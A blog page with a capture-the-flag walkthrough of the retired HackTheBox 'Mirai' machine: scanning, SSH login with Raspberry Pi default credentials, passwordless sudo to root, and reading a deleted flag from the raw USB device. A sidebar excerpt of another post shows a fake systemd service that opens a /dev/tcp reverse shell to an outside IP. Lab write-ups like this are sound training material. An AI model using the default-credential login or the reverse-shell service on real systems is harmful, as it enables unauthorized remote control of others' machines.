Skip to main content

HackTheBox - Mirai - Retired - Updated

HackTheBox - Mirai - Retired


Recon

I've been using threader3000 lately for my recon scans. It does a staged scan the first scan is a simple fast up/down scan on all TCP ports. Then it suggests a nmap scan based on just the ports found open in the initial scan, it automatically saves the nmap scan as XML.


threader3000




I then convert the XML to HTML to make it easier to read.


xsltproc ./mirai.htb/mirai.htb.xml -o ./mirai.html




Let's see what we learn from this 


Nmap thinks its a debian based box.


Port 22 OpenSSH 6.7p1

Port 53 dnsmasq 2.76

Port 80 lighttpd 1.4.35

Port 1121 Platinum UPnp 1.0.5.13

Port 32400 Plex

Port 32469 Platinum UpnP 1.0.5.13



Looks like we have DNS running, SSH and some media server software.


Let's take a look at the webserver and see what we can find.



Website blocked by pi-hole?


If you are running a pi-hole on your network ( like yours truly) this is super confusing. I thought my pi-hole was block.. But then I saw the version number


Pi-Hole v3.1.4 


I'm running a new version so this is not my pi hole but something related to this box.




Well guess what? If you don't know a PI-Hole is a DNS you can run that you can use to block ads on and other sites from your local network.. So this must be what is going on on Port 53. 


Also if we don't use a DNS name then we don't go to that service so I just tried hitting it via IP address instead.



Now I just get a blank page… but at least it's not a pihole block message.


Let's run a brute force scan on the directories and files here at this IP address and see if we can find any other things it might be serving here.




Dirb found an admin directory


If we try it, we get the admin panel for the pi-hole installation.


Here is the version information again.


So I googled around for an RCE exploit or LFI for plex or pi-hole that might help out here…


Then I googled the name of the box mirai.


Turns out this is the name given to a bot net that would use IOT devices, it would try to access them using the default credentials setup by the manufacturers.


https://en.wikipedia.org/wiki/Mirai_(malware)



So If this is running pi-hole there is a good chance this is a raspberryPI device… and they do come with a default login of 


Username: pi

Password: raspberry











Exploit


Let's see if we can login to the SSH using the raspberry PI default credentials.







And now we are inside the box.



And now we can get the user flag in the /Desktop folder of the user pi


One of the first things I always check on Linux boxes when I have a user account is their sudo privileges.


sudo -l




Wow pi can run anything as root with no password.. 


So we could just cat out the root.txt file from here.


sudo cat /root/root.txt 




Tricky…. We get a note here about them moving the root.txt to a backup of a USB stick.


Well first let's get rid of the user pi and move to the root users. Since they can do any sudo without a password we can just


sudo su root



Now we can poke around and see if we can find that backup file.


Let's see what is connected to the machine.

df




Looks like there is a device /dev/sdb that is mounted on /media/usbstick


I moved to the /media folder and found a directory called usbstick


Inside there was a file named damnit.txt


root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?



So we need to look for a deleted file on /dev/sdb?


If we ls in the lost+found folder we get nothing… 


However in linux "everything is a file" which means /dev/sdb is a file… and if it's a file…. We can cat it.


cat /dev/sdb



And here towards the end of the output we get our flag









Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more